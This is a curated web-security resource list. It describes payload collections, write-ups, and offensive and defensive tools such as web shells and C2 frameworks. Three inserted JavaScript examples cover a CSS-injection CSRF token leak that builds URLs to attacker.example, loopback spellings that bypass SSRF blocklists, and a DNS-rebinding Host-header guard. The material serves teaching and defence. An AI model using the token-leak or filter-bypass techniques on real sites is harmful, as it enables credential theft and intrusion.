Awesome Web Security
🐶 A curated list of Web Security materials and resources.
Thank you qazbnm456 & contributors
View Topic on GitHub:
qazbnm456/awesome-web-security
Digests
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Written by Netsparker.
A weekly distillation of the best security tools, blog posts, and conference talks, covering AppSec, cloud and container security, DevSecOps, and more.
Forums
XSS - Cross-Site Scripting
HTML5 Security Cheatsheet - A collection of HTML5 related XSS attack vectors
Awesome XSS stuff
A XSS mind map ;)
🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Written by Google.
Prototype Pollution
Content released at NorthSec 2018 for my talk on prototype pollution
Written by @securitymb.
CSV Injection
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Written by Andy.
SQL Injection
🎯 SQL Injection Payload List
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Command Injection
The Ruby Programming Language [mirror]
🎯 Command Injection Payload List
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
ORM Injection
Written by @_m0bius.
Written by Mikhail Egorov.
FTP Injection
Written by Timothy Morgan.
XXE - XML eXternal Entity
🎯 XML External Entity (XXE) Injection Payload List
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Written by portswigger.
Written by Timothy D. Morgan and Omar Al Ibrahim.
CSRF - Cross-Site Request Forgery
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Clickjacking
SSRF - Server-Side Request Forgery
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Web Cache Poisoning
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Relative Path Overwrite
Written by The Morning Paper.
Open Redirect
🎯 Open Redirect Payload List
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Security Assertion Markup Language (SAML)
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Written by epi.
Written by epi.
Upload
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Rails
Checklist of security precautions for Ruby on Rails applications.
AngularJS
Written by Gareth Heyes.
ReactJS
SSL/TLS
🔐 Tutorial of setting up security for your API with one-way authentication (TLS/SSL) and mutual authentication for a Java-based web server and client, both with Spring Boot. Different clients are provided, such as Apache HttpClient, OkHttp, Spring RestTemplate, Spring WebFlux WebClient (Jetty and Netty), the old and the new JDK HttpClient, the old and the new Jersey Client, Google HttpClient, Unirest, Retrofit, Feign, Methanol, vertx, the Scala clients Finagle, Featherbed, Dispatch Reboot, AsyncHttpClient, Sttp, Akka, Requests Scala and Http4s Blaze, and the Kotlin clients Fuel, http4k, Kohttp and ktor. Other server examples are also available, such as Jersey with Grizzly.
Webmail
NFS
AWS
Written by Dwight Hohnstein from Rhino Security Labs.
Written by VirtueSecurity.
Written by VirtueSecurity.
Azure
Written by @rhinobenjamin.
Sub Domain Enumeration
Written by Bharath.
Crypto
A lot ready to use best practice examples for securing web servers and more.
Web Shell
OSINT
DNS Rebinding
Written by @brannondorsey
Deserialization
OAuth
Written by @PhilippeDeRyck.
JWT
XXE
CSP
WAF
JSMVC
Authentication
CSRF
Stealing CSRF tokens with CSS injection (without iFrames)
Written by @riyazwalikar.
Written by @rramgattie.
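The CSRF entry above on stealing tokens with CSS injection rests on one primitive: a CSS attribute selector such as `input[name="csrf"][value^="9f"]` matches only when the token starts with that prefix, and the matching rule's `background:url(...)` makes the browser fetch an attacker URL that encodes the prefix. Repeating this once per character recovers the whole token. The following is an added example, not code from that write-up or from any project on this list; it simulates the leak offline. The input name `csrf`, the hex alphabet, the callback host `attacker.example` and the sample token are assumptions.

```javascript
// Added example, not from the original list. Simulates offline how CSS
// attribute selectors leak a hidden CSRF token one character per round.
// The field name, alphabet, callback host and token are all assumed.

const ALPHABET = "0123456789abcdef"; // assumption: the token is hex

// One round of injected CSS: one rule per candidate next character. Only the
// rule whose [value^=...] prefix matches the real token triggers a request.
function buildLeakRules(knownPrefix, exfilBase, alphabet = ALPHABET) {
  return [...alphabet].map((ch) => {
    const prefix = knownPrefix + ch;
    const exfilUrl = `${exfilBase}/${encodeURIComponent(prefix)}`;
    return {
      prefix,
      exfilUrl,
      css: `input[name="csrf"][value^="${prefix}"]{background:url(${exfilUrl})}`,
    };
  });
}

// Stand-in for the victim's browser applying the rules to
// <input type="hidden" name="csrf" value="..."> : returns the single URL the
// browser would fetch, or null when no selector matches.
function browserRequestFor(rules, tokenValue) {
  const hits = rules.filter((r) => tokenValue.startsWith(r.prefix));
  if (hits.length > 1) throw new Error("two prefixes of equal length cannot both match");
  return hits.length === 1 ? hits[0].exfilUrl : null;
}

// Attacker side: recover the leaked prefix from the callback URL.
function prefixFromRequest(exfilBase, url) {
  return decodeURIComponent(url.slice(exfilBase.length + 1));
}

// Drive rounds until no rule matches, i.e. the token is exhausted (or it
// contains a character outside the alphabet, which also stops the leak).
// In a real attack every round needs a fresh stylesheet to be applied;
// here a plain loop stands in for that.
function leakToken(tokenValue, exfilBase, alphabet = ALPHABET, maxLen = 64) {
  let known = "";
  let requests = 0;
  while (known.length < maxLen) {
    const rules = buildLeakRules(known, exfilBase, alphabet);
    const url = browserRequestFor(rules, tokenValue);
    if (url === null) break;
    requests += 1;
    known = prefixFromRequest(exfilBase, url);
  }
  return { token: known, requests };
}

// Constructed sample run: a six-character token takes six callbacks.
console.log(leakToken("9f3ab1", "https://attacker.example/leak"));
```

The cost is one callback per character, not per guess, because the browser evaluates all selectors of a round at once. The channel depends on the page loading attacker-controlled stylesheets and images, so a Content-Security-Policy that restricts `style-src` and `img-src` removes it even when the token stays in a `value` attribute.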
Clickjacking
Remote Code Execution
Written by [email protected] 404 Team.
Written by @breenmachine.
Written by OpSecX.
Written by Ambionics Security.
Written by @capacitorset.
Written by @iblue.
Written by RIPS Technologies.
Written by Orange.
Written by Ezequiel Pereira.
XSS
Written by Jorge Lajara.
Written by HAHWUL.
Written by @garethheyes.
Written by @terjanq.
Written by kenziy.
Written by Mario Heiderich.
Written by @marin_m.
Written by Sebastian Lekies, Krzysztof Kotowicz, and Eduardo Vela.
Written by Michał Bentkowski.
Written by Michał Bentkowski.
SQL Injection
NoSQL Injection
FTP Injection
Written by @a66at and Alexey Osipov.
XXE
Written by Rose Jackcode.
Written by @a66at and Alexey Osipov.
Written by Ivan Novikov.
Written by skavans.
Written by Timothy D. Morgan.
Written by Renaud Dubourguais.
Written by Antti Rantasaari.
Written by Arseniy Sharoglazov.
SSRF
Web Cache Poisoning
Written by @albinowax.
Header Injection
URL
Written by Xudong Zheng.
Deserialization
OAuth
Others
documentation and writing
Written by @alex.birsan.
Frontend (like SOP bypass, URL spoofing, and something like that)
Written by @shhnjk.
Written by @filedescriptor.
Written by @rafaybaloch.
Written by jameshfisher.
Written by portswigger.
Written by James Lee.
Written by Manuel.
Written by aaj at google.com and mkwst at google.com.
Written by Michał Bentkowski.
Written by David Gilbertson.
Written by @kinugawamasato.
Backend (core of Browser implementation, and often refers to C or C++ part)
Written by [email protected].
Written by SecuriTeam Secure Disclosure (SSD).
Written by @moritzj.
Written by @wanderingglitch.
Written by RET2 SYSTEMS, INC.
Written by Diary of a reverse-engineer.
Database
A collection of JavaScript engine CVEs with PoCs
✍️ A curated list of CVE PoCs.
A collection of PoCs and exploits for various vulnerabilities, gathered or written by the author.
🔪Browser logic vulnerabilities
Cheatsheets
CTF Cheatsheet
Auditing
Prowler is a security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness. It contains all CIS controls listed here https://d0.awsstatic.com/whitepapers/compliance/AWS_CIS_Foundations_Benchmark.pdf and more than 100 additional checks that help with GDPR, HIPAA and other security requirements.
Automated scanning for SSL/TLS vulnerabilities.
Command Injection
Automated All-in-One OS command injection and exploitation tool.
OSINT - Open-Source Intelligence
Incredibly fast crawler designed for OSINT.
Tool to find metadata and hidden information in the documents.
XRay is a tool for recon, mapping and OSINT gathering from public networks.
Reconnaissance tool for GitHub organizations
GitHub Sensitive Information Leakage (monitoring for sensitive information leaked on GitHub)
raven is a LinkedIn information-gathering tool that pentesters can use to gather information about an organization's employees via LinkedIn.
Reconnaissance Swiss Army Knife
The most complete open-source tool for Twitter intelligence analysis
A high performance offensive security tool for reconnaissance and vulnerability scanning
A Social Media Enumeration & Correlation Tool by Jacob Wilkin(Greenwolf)
Shodan is the world's first search engine for Internet-connected devices by @shodanhq.
Censys is a search engine that allows computer scientists to ask questions about the devices and networks that compose the Internet by University of Michigan.
Open source footprinting and intelligence-gathering tool by @binarypool.
Various databases which you can use for your OSINT research by @technisette.
Sub Domain Enumeration
Fast subdomain enumeration tool for penetration testers
EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible.
A fast subdomain brute-force tool for pentesters
A Tool for Domain Flyovers
Analyze the security of any domain by finding all the information possible. Made in python.
Auditing for TLS certificates.
A domain searcher named GoogleSSLdomainFinder - a subdomain lookup tool based on Google's Certificate Transparency logs
Searching for domain information by VirusTotal.
Enter an Identity (Domain Name, Organization Name, etc), a Certificate Fingerprint (SHA-1 or SHA-256) or a crt.sh ID to search certificate(s) by @crtsh.
Code Generating
Vulnerable web application generator
Fuzzing
Web application fuzzer
A script that inspects multi-byte character sets looking for characters with specific user-defined properties
A simple tool to convert the IP to a DWORD IP
DOM fuzzer
Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.
Find web directories without bruteforce
Potentially dangerous files
Online service that performs a deep analysis of the configuration of any SSL web server on the public internet. Provided by Qualys SSL Labs.
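Two entries above (the DWORD IP converter and the directory/file discovery tools) both exist because URL filters often compare strings rather than parsed values. An SSRF blocklist that looks for the text `127.0.0.1` is bypassed by the DWORD form `2130706433`, the hex form `0x7f000001`, octal `0177.00.00.01`, or the shorthand `127.1`, all of which a browser or HTTP client resolves to the same loopback address. The following is an added example, not code from the listed tool: it generates those spellings, shows the naive substring check missing every one of them, and shows the same check passing once the URL is first normalized through Node's built-in WHATWG `URL` parser. The blocklist contents and sample URLs are constructed.

```javascript
// Added example, not part of the original list or of any tool it links.
// Shows why a substring blocklist for loopback/metadata addresses is bypassed
// by alternative IPv4 spellings (DWORD, hex, octal, dotless shorthand) and how
// normalizing through the WHATWG URL parser (Node's built-in URL) closes the
// gap. All URLs below are constructed for illustration.

// Alternative spellings of a dotted-quad IPv4 address that URL parsers accept.
function ipv4Variants(dotted) {
  const o = dotted.split(".").map(Number);
  if (o.length !== 4 || o.some((n) => !Number.isInteger(n) || n < 0 || n > 255)) {
    throw new Error(`not a dotted quad: ${dotted}`);
  }
  const dword = ((o[0] << 24) >>> 0) + (o[1] << 16) + (o[2] << 8) + o[3];
  return {
    dword: String(dword),                                      // 2130706433
    hex: "0x" + dword.toString(16).padStart(8, "0"),           // 0x7f000001
    octal: o.map((n) => "0" + n.toString(8)).join("."),         // 0177.00.00.01
    shorthand: `${o[0]}.${(o[1] << 16) + (o[2] << 8) + o[3]}`, // 127.1
  };
}

// The kind of check an SSRF filter often starts with: match the literal text.
function naiveIsBlocked(url) {
  return ["127.0.0.1", "localhost", "169.254.169.254"].some((s) => url.includes(s));
}

// Parse first, then compare the canonical hostname. Unparseable input and
// non-HTTP schemes are denied rather than let through.
const BLOCKED_HOSTS = new Set(["127.0.0.1", "[::1]", "localhost", "0.0.0.0", "169.254.169.254"]);
function normalizedIsBlocked(url) {
  let parsed;
  try {
    parsed = new URL(url);
  } catch {
    return true;
  }
  if (parsed.protocol !== "http:" && parsed.protocol !== "https:") return true;
  return BLOCKED_HOSTS.has(parsed.hostname);
}

// Run both checks over every spelling of one address.
function compareChecks(dotted, path = "/latest/meta-data/") {
  return Object.entries(ipv4Variants(dotted)).map(([form, host]) => {
    const url = `http://${host}${path}`;
    return {
      form,
      url,
      naiveBlocked: naiveIsBlocked(url),
      normalizedBlocked: normalizedIsBlocked(url),
    };
  });
}

console.log(compareChecks("127.0.0.1"));
```

Normalizing the literal is only the first half of the check: a hostname such as `internal.attacker.example` that resolves to a private address passes `normalizedIsBlocked`, and an IPv4-mapped IPv6 literal like `[::ffff:127.0.0.1]` is serialized as `[::ffff:7f00:1]` rather than `127.0.0.1`. The complete control resolves the name and validates the address actually connected to (and re-validates on redirects), which also covers the DNS rebinding case covered later in this list.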
Scanning
WPScan WordPress security scanner. Written for security professionals and blog maintainers to test the security of their WordPress websites.
A free software to find the components installed in Joomla CMS, built out of the ashes of Joomscan.
WAScan - Web Application Scanner
Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use.
Penetration Testing
The Offensive Manual Web Application Penetration Testing Framework.
Automated security testing for REST APIs
A collection of AWS penetration testing junk
Burp Suite is an integrated platform for performing security testing of web applications by portswigger.
XSS - Cross-Site Scripting
The Browser Exploitation Framework Project
JShell - Get a JavaScript shell with XSS.
Most advanced XSS scanner.
XSS'OR - Hack with JavaScript.
SQL Injection
Automatic SQL injection and database takeover tool
Template Injection
Server-Side Template Injection and Code Injection Detection and Exploitation Tool
XXE
List DTDs and generate XXE payloads using those local DTDs.
Cross Site Request Forgery
The Prime Cross Site Request Forgery (CSRF) Audit and Exploitation Toolkit.
Server-Side Request Forgery
Open redirect/SSRF payload generator by intigriti.
Leaking
HTTPLeaks - All possible ways a website can leak HTTP requests
Rip web accessible (distributed) version control systems: SVN/GIT/HG...
Pillage web accessible GIT, HG and BZR repositories
Tool for advanced mining for content on Github
Scan git repos (or files) for secrets using regex and entropy 🔑
Chrome extension and Express server that exploits keylogging abilities of CSS.
Git manager for pentesters
Tool to scan for secret files on HTTP servers
A python script that finds endpoints in JavaScript files
Detecting
scanner detecting the use of JavaScript libraries with known vulnerabilities
Sandbox for semi-automatic Javascript malware analysis, deobfuscation and payload extraction. Written for Node.js
Scan your code for security misconfiguration, search for passwords and secrets.
bXSS is a utility which can be used by bug hunters and organizations to identify Blind Cross-Site Scripting.
🔥Open source RASP solution
Preventing
DOMPurify - a DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. DOMPurify works with a secure default, but offers a lot of configurability and hooks. Demo:
Sanitize untrusted HTML (to prevent XSS) with a configuration specified by a Whitelist
Database security suite. Database proxy with field-level encryption, search through encrypted data, SQL injections prevention, intrusion detection, honeypots. Supports client-side and proxy-side ("transparent") encryption. SQL, NoSQL.
A set of tools for building/evaluating/monitoring content-security-policy to prevent/detect cross site scripting by Csper.
Proxy
An interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.
HTTP proxy / HTTP monitor / Reverse Proxy that enables a developer to view all of the HTTP and SSL / HTTPS traffic between their machine and the Internet.
Webshell
Nano is a family of PHP web shells which are code golfed for stealth.
This is a webshell open source project
Weaponized web shell
Manage your website via terminal
A multiple reverse shell session/client manager via terminal
Reverse Shell as a Service
Full-featured C2 framework which silently persists on webserver via evil PHP oneliner
Disassembler
Plasma is an interactive disassembler for x86/ARM/MIPS. It can generate indented pseudo-code with colored syntax.
UNIX-like reverse engineering framework and command-line toolset
This project has been moved to:
Decompiler
DNS Rebinding
A front-end JavaScript toolkit for creating DNS rebinding attacks.
DNS Rebinding Exploitation Framework
A DNS rebinding attack framework.
A "malicious" DNS server for executing DNS Rebinding attacks on the fly (public instance running on rebind.network:53)
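The rebinding tools above all work the same way: the attacker's page is served from a hostname whose DNS answer is switched, after a short TTL, to an internal address, so the victim's browser then sends same-origin requests to that internal service while still carrying `Host: <attacker's hostname>`. A service bound to an internal address defeats this by refusing any request whose Host header is not one of its own names or addresses. The following is an added example, not code from any listed tool or framework: a Host header parser and allowlist check for a Node HTTP handler. The allowlist entries, the `device.internal` name and the sample requests are assumptions.

```javascript
// Added example, not code from the original list or any tool it links.
// Host-header validation as a DNS rebinding defence for a service on an
// internal address: after rebinding, the browser's request still says
// "Host: attacker.example", so refusing unknown Host values blocks it.
// The allowlist and the sample requests below are constructed.

const ALLOWED_HOSTS = new Set(["localhost", "127.0.0.1", "[::1]", "device.internal"]);

// Split a Host header into hostname and port. Accepts bracketed IPv6
// literals and rejects anything that is not a single, well-formed authority.
function parseHostHeader(raw) {
  if (typeof raw !== "string" || raw.length === 0 || raw.length > 255) return null;
  const m = /^(\[[0-9a-f:.]+\]|[a-z0-9.-]+)(?::(\d{1,5}))?$/i.exec(raw.trim());
  if (!m) return null;
  const port = m[2] === undefined ? null : Number(m[2]);
  if (port !== null && (port < 1 || port > 65535)) return null;
  return { hostname: m[1].toLowerCase(), port };
}

// True only when the hostname is on the allowlist and, if the service knows
// the port it listens on, the header's port (when present) matches it.
function isAllowedHost(raw, allowed = ALLOWED_HOSTS, expectedPort = null) {
  const parsed = parseHostHeader(raw);
  if (!parsed) return false;
  if (expectedPort !== null && parsed.port !== null && parsed.port !== expectedPort) return false;
  return allowed.has(parsed.hostname);
}

// Gate to run before routing in an http.createServer handler. 421
// (Misdirected Request) is the status defined for "this is not my Host".
function guardRequest(req, allowed = ALLOWED_HOSTS, expectedPort = null) {
  return isAllowedHost(req.headers.host, allowed, expectedPort)
    ? { status: 200, reason: "host accepted" }
    : { status: 421, reason: "Host header not recognized" };
}

// Constructed requests: one from the device's own name, one as the browser
// would send it after attacker.example has been rebound to this address.
const legit = { headers: { host: "device.internal" } };
const rebound = { headers: { host: "attacker.example" } };
console.log(guardRequest(legit), guardRequest(rebound));
```

The check has to run before any route handler and before CORS processing, since rebinding requests are same-origin from the browser's point of view and carry no `Origin` header. Binding the service to loopback only does not replace it: loopback is exactly where rebinding lands.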
Others
The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis
Parse NTLM challenge messages over HTTP and SMB
Minimal code to connect to a CEF debugger.
Interactive CTF Exploration Tool
Social Engineering Database
Check if you have an account that has been compromised in a data breach by Troy Hunt.
Blogs
Twitter Users
Initiative to showcase open source hacking tools for hackers and pentesters
Active penetration tester who often tweets and writes useful articles
[Cure53](https://cure53.de/) is a German cybersecurity firm.
The wonderland of JavaScript unexpected usages, and more.
Security Researcher, interested in web security, crypto, pentest, static analysis but most of all, samy is my hero.
Application
OWASP Juice Shop: Probably the most modern and sophisticated insecure web application
vulnerable web application for training
Learn SELinux by doing. Solve Puzzles, show skillz - Written by @selinuxgame.
Free trainings and labs - Written by PortSwigger.
AWS
CloudGoat is Rhino Security Labs' "Vulnerable by Design" AWS deployment tool
XSS
ModSecurity / OWASP ModSecurity Core Rule Set
Series of tutorials to install, configure and tune ModSecurity and the Core Rule Set - Written by @ChrFolini.
Community
Miscellaneous
A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups.
Inspired by https://github.com/djadmin/awesome-bug-bounty, a list of bug bounty write-ups categorized by the nature of the bug
Decrypted content of eqgrp-auction-file.tar.xz
Some public notes
An Information Security Reference That Doesn't Suck
Written by Daniel Stelter-Gliese.
Written by PwnDizzle.
Penetration Testing and Exploit Dev CheatSheet.
Written by @gregose.
Check if your internet-connected devices at home are public on Shodan by BullGuard.
Written by Ezequiel Pereira.
Written by @fransrosen.
Written by voidsec.
Written by Chris Patten, Tom Steele.
Written by @umpox.
Written by sigpwn.
Written by Ruslan Habalov.
Written by Paul Dannewitz.
Written by @AntoGarand.
Written by @gergoturcsanyi.
Written by @0daywork.
Written by Jayson.
Written by David Scrobonia.
Written by @slashcrypto.
Written by Gwen.
Written by Brian Wallace.
Written by @sandrogauci.